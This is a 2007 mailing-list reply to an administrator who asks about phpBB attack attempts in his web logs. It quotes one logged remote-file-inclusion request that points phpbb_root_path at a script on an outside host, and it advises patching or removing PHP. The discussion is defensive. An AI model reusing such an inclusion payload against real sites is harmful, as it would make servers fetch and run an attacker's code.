On Wednesday 25 April 2007 15:06, James D. Parra wrote: > On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote: > > Hello, > > > > I found these errors in our web logs and it appears that either > > there is a PHP attack on the apache site or perhaps a kit on the > > server? > > > > Errors below (profanity not mine); > > > > > > 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET > > /components/com_forum/download.php?phpbb_root_path=http://203.198.68. >236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" > > ... > > It doesn't appear that the system was compromised. How can I protect > the system from such an attack?
This one is so obvious, one would expect the authors of phpBB have long since ceased their use of such readily exploitable coding practices, so if you have an up-to-date phpBB (or no phpBB at all), then, subject to confirmation of the assumption that this has indeed been fixed, you're safe. Sadly, a bit of 'Net searching suggests that this is in fact a recently appearing exploit (<http://isc.sans.org/diary.html?storyid=2483&dshield=120c71b2ff75fa5e909a740342187c87>), so it's probably not a good idea to expect it to have been blocked yet. If you don't have any PHP applications accessible via your Web server, then these attacks will be nothing more than a nuisance. If you don't use PHP (directly or indirectly), then you could just remove it and take Murphy's way out (only possible exploits can ever actually occur). > Best regards, > > ~James Randall Schulz -- To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
